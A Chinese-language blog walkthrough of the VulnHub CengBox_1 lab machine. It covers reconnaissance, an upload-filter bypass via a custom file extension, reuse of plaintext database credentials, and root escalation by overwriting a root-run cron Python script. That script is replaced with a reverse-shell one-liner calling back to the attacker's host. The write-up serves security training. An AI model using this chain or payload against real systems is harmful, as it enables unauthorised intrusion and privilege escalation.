CengBox_1 靶机

信息收集

┌──(kali㉿kali)-[~/Documents/CengBox]
└─$ sudo nmap --min-rate 10000 -p- 192.168.1.102 

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

开放了 22, 80 端口

┌──(kali㉿kali)-[~/Documents/CengBox]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.1.102

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:cc:28:f3:8c:f5:0e:3f:5a:ed:13:f3:ad:53:13:9b (RSA)
|   256 f7:3a:a3:ff:a1:f7:e5:1b:1e:6f:58:5f:c7:02:55:9b (ECDSA)
|_  256 f0:dd:2e:1d:3d:0a:e8:c1:5f:52:7c:55:2c:dc:1e:ef (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: CEng Company

Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ubuntu 操作系统

┌──(kali㉿kali)-[~/Documents/CengBox]
└─$ sudo nmap --script=vuln -p22,80 192.168.1.102 

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server\'s resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
| http-fileupload-exploiter: 
|   
|_    Couldn\'t find a file-type field.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.

漏洞脚本扫描没找到有价值的信息。

目录爆破

目录爆破一下

┌──(kali㉿kali)-[~/Documents/CengBox]
└─$ sudo dirsearch -u http://192.168.1.102       

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

[07:31:24] 301 -  311B  - /js  ->  http://192.168.1.102/js/                                               
[07:31:39] 301 -  312B  - /css  ->  http://192.168.1.102/css/               
[07:31:42] 200 -    3KB - /gulpfile.js                                      
[07:31:43] 301 -  312B  - /img  ->  http://192.168.1.102/img/               
[07:31:43] 200 -    6KB - /index.php                                        
[07:31:43] 200 -    6KB - /index.php/login/                                 
[07:31:44] 403 -  278B  - /js/                                              
[07:31:45] 301 -  320B  - /masteradmin  ->  http://192.168.1.102/masteradmin/
[07:31:52] 403 -  278B  - /server-status                                    
[07:31:52] 403 -  278B  - /server-status/                                   
[07:31:56] 301 -  316B  - /uploads  ->  http://192.168.1.102/uploads/       
[07:31:56] 403 -  278B  - /uploads/                                         
[07:31:57] 403 -  278B  - /vendor/

一些感兴趣的目录，但是都是 403 ：img, masteradmin, uploads 先看看 web 界面吧

收集到一些信息

web title:CEng Company
cengover@cengbox.com
+1 (555) 902-8832
1142 Baker Street, London UK

但还是没找到可攻击的入口，尝试对二级目录扫描

┌──(kali㉿kali)-[~/Documents/CengBox]
└─$ sudo dirsearch -u http://192.168.1.102/masteradmin/

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

[07:43:49] 301 -  324B  - /masteradmin/css  ->  http://192.168.1.102/masteradmin/css/
[07:43:50] 200 -    0B  - /masteradmin/db.php                               
[07:43:52] 301 -  326B  - /masteradmin/fonts  ->  http://192.168.1.102/masteradmin/fonts/
[07:43:53] 301 -  327B  - /masteradmin/images  ->  http://192.168.1.102/masteradmin/images/
[07:43:53] 403 -  278B  - /masteradmin/images/                              
[07:43:55] 403 -  278B  - /masteradmin/js/                                  
[07:43:56] 200 -    5KB - /masteradmin/login.php                            
[07:44:09] 200 -    1KB - /masteradmin/upload.php                           
[07:44:10] 403 -  278B  - /masteradmin/vendor/

发现了一些可以访问的有价值文件

登录界面网页源码中没有隐藏信息

构造请求包上传文件

upload.php 访问会跳转到登录界面，burp 看看历史记录

被 js 跳转到了 login.php 但是往下翻响应包发现了有趣的事情

<form action="" method="POST" enctype= "multipart/form-data">
  <input type="file" multiple name="image" id="image">
  <p>Drag your files here or click in this area.</p>
  <button type="submit" name="submit">Upload</button>
</form>

虽然跳转了，但是响应包中还是有上传入口的代码，也就是说我们是可以正常访问 upload.php 的，自己构造一下包，使用 burp 来发送请求包。为了构造请求包方便，我将上个网页代码 form 框中的 action 值设置为了远程目标主机，然后本地写入了个 html，这样我可以直接点击上传然后抓包就行。

1	`action="http://192.168.1.102/masteradmin/upload.php"`

响应包提示 extension not allowed, please choose a CENG file.

尝试更改 Content-Type，无效，卡了一会

尝试更改文件名后缀

成功，我们在之前目录爆破的时候，发现过 uploads 目录，虽然是 403

这里我们提前开启监听，然后访问 http://192.168.1.102/uploads/1.ceng`

┌──(kali㉿kali)-[~/Documents/CengBox]
└─$ sudo nc -lvnp 443                                    
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 56028
Linux cengbox 4.4.0-177-generic #207-Ubuntu SMP Mon Mar 16 01:16:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 15:15:19 up 57 min,  0 users,  load average: 0.00, 0.00, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:f8:53:a5 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.102/24 brd 192.168.1.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fef8:53a5/64 scope link 
       valid_lft forever preferred_lft forever
$ uname -a
Linux cengbox 4.4.0-177-generic #207-Ubuntu SMP Mon Mar 16 01:16:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
$ which python
$ which python2
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@cengbox:/$

提权

查看数据库配置文件

查看网站根目录文件，因为有登录界面，所以顺便找一找数据库配置文件，看看能不能获取到数据库明文密码

www-data@cengbox:/var/www/html$ ls -liha
ls -liha
total 52K
 922200 drwxr-xr-x 9 www-data www-data 4.0K Apr 29  2020 .
 922199 drwxr-xr-x 3 root     root     4.0K Apr 25  2020 ..
 916283 -rw-r--r-- 1 www-data www-data   97 Apr 29  2020 .htaccess
1050978 drwxr-xr-x 2 www-data www-data 4.0K Apr 26  2020 css
1051150 -rw-r--r-- 1 www-data www-data 3.5K Sep 17  2019 gulpfile.js
1050981 drwxr-xr-x 2 www-data www-data 4.0K Apr 26  2020 img
 916246 -rw-r--r-- 1 www-data www-data 5.7K Apr 28  2020 index.php
1050984 drwxr-xr-x 2 www-data www-data 4.0K Apr 26  2020 js
 915850 drwxr-xr-x 7 www-data www-data 4.0K Apr 29  2020 masteradmin
1050987 drwxr-xr-x 2 www-data www-data 4.0K Apr 26  2020 scss
   2691 drwxr-xr-x 2 www-data www-data 4.0K Oct 16 15:15 uploads
 925140 drwxr-xr-x 6 www-data www-data 4.0K Apr 26  2020 vendor
www-data@cengbox:/var/www/html$ cd masteradmin
cd masteradmin
www-data@cengbox:/var/www/html/masteradmin$ ls -liah
ls -liah
total 44K
 915850 drwxr-xr-x  7 www-data www-data 4.0K Apr 29  2020 .
 922200 drwxr-xr-x  9 www-data www-data 4.0K Apr 29  2020 ..
1055493 drwxr-xr-x  2 www-data www-data 4.0K Apr 26  2020 css
 916187 -rw-r--r--  1 www-data www-data  311 Apr 27  2020 db.php
 915922 drwxr-xr-x  5 www-data www-data 4.0K Apr 26  2020 fonts
 915857 drwxr-xr-x  3 www-data www-data 4.0K Apr 26  2020 images
   2671 drwxr-xr-x  2 www-data www-data 4.0K Apr 26  2020 js
 916415 -rw-r--r--  1 www-data www-data 5.7K Apr 28  2020 login.php
 916189 -rw-r--r--  1 www-data www-data 2.2K Apr 29  2020 upload.php
 915876 drwxr-xr-x 10 www-data www-data 4.0K Apr 26  2020 vendor
www-data@cengbox:/var/www/html/masteradmin$ cat db.php
cat db.php
<?php
$serverName = "localhost";
$username = "root";
$password = "SuperS3cR3TPassw0rd1!";
$dbName = "cengbox";
//Create Connection
$conn = new mysqli($serverName, $username, $password,$dbName);

//Check Connection
if($conn->connect_error){
        die("Connection Failed: ".$conn->connect_error);
} else { }
?>

拿到了数据库密码 SuperS3cR3TPassw0rd1! 尝试使用此密码切换登录到其他用户

www-data@cengbox:/var/www/html/masteradmin$ ls -liah /home
ls -liah /home
total 16K
654081 drwxr-xr-x  4 root     root     4.0K Apr 25  2020 .
     2 drwxr-xr-x 23 root     root     4.0K Apr 26  2020 ..
793691 drwxr-xr-x  3 root     root     4.0K Apr 25  2020 .ecryptfs
793690 dr-x------  2 cengover cengover 4.0K Apr 25  2020 cengover
www-data@cengbox:/var/www/html/masteradmin$ su cengover
su cengover
Password: SuperS3cR3TPassw0rd1!

su: Authentication failure

登录数据库看看

www-data@cengbox:/var/www/html/masteradmin$ mysql -uroot -p
mysql -uroot -p
Enter password: SuperS3cR3TPassw0rd1!

mysql> select * from admin;
select * from admin;
+----+-------------+---------------+
| id | username    | password      |
+----+-------------+---------------+
|  1 | masteradmin | C3ng0v3R00T1! |
+----+-------------+---------------+

发现数据库中保存了明文密码

密码重用切换登录

使用此密码切换登录

www-data@cengbox:/var/www/html/masteradmin$ ps aux | grep mysql
ps aux | grep mysql
mysql     1137  0.2 14.6 1116336 148404 ?      Ssl  14:17   0:08 /usr/sbin/mysqld
www-data  2000  0.0  0.0  11280  1008 pts/0    S+   15:21   0:00 grep mysql
www-data@cengbox:/var/www/html/masteradmin$ su cengover
su cengover
Password: C3ng0v3R00T1!

登录成功，基础的信息收集，查看用户 sudo 权限和家目录文件

cengover@cengbox:/var/www/html/masteradmin$ sudo -l
sudo -l
[sudo] password for cengover: C3ng0v3R00T1!

Sorry, user cengover may not run sudo on cengbox.
cengover@cengbox:/var/www/html/masteradmin$ cd ~
cd ~
cengover@cengbox:~$ ls -alih
ls -alih
total 116K
793696 drwx------ 4 cengover cengover 4.0K Apr 29  2020 .
654081 drwxr-xr-x 4 root     root     4.0K Apr 25  2020 ..
785396 -rw------- 1 cengover cengover    0 Apr 29  2020 .bash_history
793703 -rw-r--r-- 1 cengover cengover  220 Apr 25  2020 .bash_logout
793704 -rw-r--r-- 1 cengover cengover 3.7K Apr 25  2020 .bashrc
793688 drwx------ 2 cengover cengover 4.0K Apr 25  2020 .cache
793701 lrwxrwxrwx 1 cengover cengover   34 Apr 25  2020 .ecryptfs -> /home/.ecryptfs/cengover/.ecryptfs
785233 -rw------- 1 cengover cengover  478 Apr 27  2020 .mysql_history
785217 drwxrwxr-x 2 cengover cengover 4.0K Apr 26  2020 .nano
793702 lrwxrwxrwx 1 cengover cengover   33 Apr 25  2020 .Private -> /home/.ecryptfs/cengover/.Private
793705 -rw-r--r-- 1 cengover cengover  655 Apr 25  2020 .profile
793707 -rw-r--r-- 1 cengover cengover    0 Apr 25  2020 .sudo_as_admin_successful
785383 -rw-rw-r-- 1 cengover cengover   33 Apr 29  2020 user.txt
785231 -rw------- 1 cengover cengover 7.0K Apr 29  2020 .viminfo
cengover@cengbox:~$ cat user.txt
cat user.txt
8f7f6471e2e869f029a75c5de601d5e0

看看 SUID 文件

cengover@cengbox:/home/cengover$ find / -type f -perm -04000 -ls 2>/dev/null
<yptfs/cengover/.Private$ find / -type f -perm -04000 -ls 2>/dev/null        
  1046604     44 -rwsr-xr-x   1 root     root        44680 May  7  2014 /bin/ping6
  1046620     40 -rwsr-xr-x   1 root     root        40128 May 17  2017 /bin/su
  1046589     40 -rwsr-xr-x   1 root     root        40152 May 16  2018 /bin/mount
  1046603     44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /bin/ping
  1046638     28 -rwsr-xr-x   1 root     root        27608 May 16  2018 /bin/umount
  1050914     32 -rwsr-xr-x   1 root     root        30800 Jul 12  2016 /bin/fusermount
   923699     20 -rwsr-xr-x   1 root     root        19024 Jul 13  2016 /sbin/mount.ecryptfs_private
   406290     52 -rwsr-sr-x   1 daemon   daemon      51464 Jan 15  2016 /usr/bin/at
   405770     36 -rwsr-xr-x   1 root     root        32944 May 17  2017 /usr/bin/newgidmap
   392482     52 -rwsr-xr-x   1 root     root        49584 May 17  2017 /usr/bin/chfn
   392622     56 -rwsr-xr-x   1 root     root        54256 May 17  2017 /usr/bin/passwd
   392545     76 -rwsr-xr-x   1 root     root        75304 May 17  2017 /usr/bin/gpasswd
   410350     24 -rwsr-xr-x   1 root     root        23376 Mar 27  2019 /usr/bin/pkexec
   405769     36 -rwsr-xr-x   1 root     root        32944 May 17  2017 /usr/bin/newuidmap
   393725    136 -rwsr-xr-x   1 root     root       136808 Jan 31  2020 /usr/bin/sudo
   392611     40 -rwsr-xr-x   1 root     root        39904 May 17  2017 /usr/bin/newgrp
   392484     40 -rwsr-xr-x   1 root     root        40432 May 17  2017 /usr/bin/chsh
   785419     44 -rwsr-xr--   1 root     messagebus    42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   410362    100 -rwsr-sr-x   1 root     root          98472 Mar 18  2019 /usr/lib/snapd/snap-confine
   405752     40 -rwsr-xr-x   1 root     root          38984 Jun 14  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
   410346     16 -rwsr-xr-x   1 root     root          14864 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
   392808     12 -rwsr-xr-x   1 root     root          10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
   393903    420 -rwsr-xr-x   1 root     root         428240 Mar  4  2019 /usr/lib/openssh/ssh-keysign

尝试使用之前获取的口令切换为 root 用户

cengover@cengbox:/$ su
su
Password: SuperS3cR3TPassw0rd1!

su: Authentication failure
cengover@cengbox:/$ su
su
Password: C3ng0v3R00T1!

su: Authentication failure

尝试看看敏感文件权限和定时任务文件

cengover@cengbox:/$ ls -alih /etc/shadow /etc/passwd
ls -alih /etc/shadow /etc/passwd
132989 -rw-r--r-- 1 root root   1.6K Apr 25  2020 /etc/passwd
134692 -rw-r----- 1 root shadow 1.1K Apr 25  2020 /etc/shadow
cengover@cengbox:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

pspy64 判断是否有定时任务

ssh 登录后使用 pspy64 来看是否有定时任务

1	`2023/10/16 15:39:01 CMD: UID=0 PID=2290 \| /usr/bin/python3 /opt/md5check.py`

发现了一个 python 脚本在定时以 root 身份被运行，查看文件权限

1 2	`cengover@cengbox:/tmp$ ls -liah /opt/md5check.py 916210 -rw-rw---- 1 root users 545 Apr 29 2020 /opt/md5check.py`

而我们登录的用户也属于 users 组

1 2	`cengover@cengbox:/tmp$ id uid=1000(cengover) gid=1000(cengover) groups=1000(cengover),4(adm),24(cdrom),30(dip),46(plugdev),100(users),110(lxd),117(lpadmin),118(sambashare)`

写入定时任务的脚本

直接写入反弹 shell 的内容到此文件

cengover@cengbox:/tmp$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' > /opt/md5check.py

cat 看下文件内容，确定写入成功

开启监听等待反弹

┌──(kali㉿kali)-[~/Documents/CengBox]
└─$ sudo nc -lvnp 443
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 56034
root@cengbox:~# whoami
whoami
root
root@cengbox:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@cengbox:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:f8:53:a5 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.102/24 brd 192.168.1.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fef8:53a5/64 scope link 
       valid_lft forever preferred_lft forever
root@cengbox:~# uname -a
uname -a
Linux cengbox 4.4.0-177-generic #207-Ubuntu SMP Mon Mar 16 01:16:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

成功获取到 root 权限

root@cengbox:~# ls -liah
ls -liah
total 48K
392450 drwx------  3 root root 4.0K Apr 29  2020 .
     2 drwxr-xr-x 23 root root 4.0K Apr 26  2020 ..
393878 -rw-------  1 root root    5 Apr 29  2020 .bash_history
392451 -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
392654 drwxr-xr-x  2 root root 4.0K Apr 26  2020 .nano
393896 -rw-r--r--  1 root root 6.5K Oct 16 15:45 note.txt
392452 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
394459 -rw-r--r--  1 root root  420 Apr 29  2020 root.txt
392706 -rw-r--r--  1 root root   66 Apr 28  2020 .selected_editor
394464 -rw-------  1 root root 5.3K Apr 29  2020 .viminfo
root@cengbox:~# cat root.txt
cat root.txt
 / ____|  ____|           |  _ \           
| |    | |__   _ __   __ _| |_) | _____  __
| |    |  __| | '_ \ / _` |  _ < / _ \ \/ /
| |____| |____| | | | (_| | |_) | (_) >  < 
 \_____|______|_| |_|\__, |____/ \___/_/\_\
                      __/ |                
                     |___/                 

Congrats. Hope you enjoyed it and you can contact me on Twitter @arslanblcn_

a51e522b22a439b8e1b22d84f71cf0f2

找下 flag，结束战斗

总结

不算难的靶机，需要一定的信息收集能力，包括对于二级目录的爆破和最后确定定时执行的文件脚本位置

knowledge_database > vulnhub

CengBox_1 靶机

https://i3eg1nner.github.io/2023/10/1ef2ffe7f741.html

作者

I3eg1nner

发布于

2023年10月16日

许可协议

CengBox_2 靶机上一篇

broken_2020 靶机下一篇